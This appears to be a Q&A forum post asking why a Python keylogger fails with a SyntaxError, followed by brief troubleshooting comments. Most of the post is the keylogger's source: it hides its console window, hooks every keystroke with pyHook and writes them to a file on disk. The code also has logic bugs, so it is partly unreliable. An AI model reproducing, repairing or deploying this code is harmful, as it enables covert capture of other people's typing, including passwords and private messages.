# What doesn't this python keylogger run?

Tags: python, python-3.5

```
import win32api
import win32console
import win32gui
import pythoncom,pyHook

win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
    if event.Ascii==5:
        _exit(1)
    if event.Ascii !=0 or 8:
        f=open('c:\output.txt','r+')
        buffer=f.read()
        f.close()
        f=open('c:\output.txt','w')
        keylogs=chr(event.Ascii)
        if event.Ascii==13:
            keylogs='/n'
        buffer+=keylogs
        f.write(buffer)
        f.close()
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
```

This is the message I get when running it for the first line:
SyntaxError: multiple statements found while compiling a single statement

Comment: The error refers to the first `import`?

Comment: Yes this is the error we got for the first time we tried to run it

Comment: And if I delete this one the other ones are bad aswell

Comment: Try to import separately `pythoncom` and `pyHook`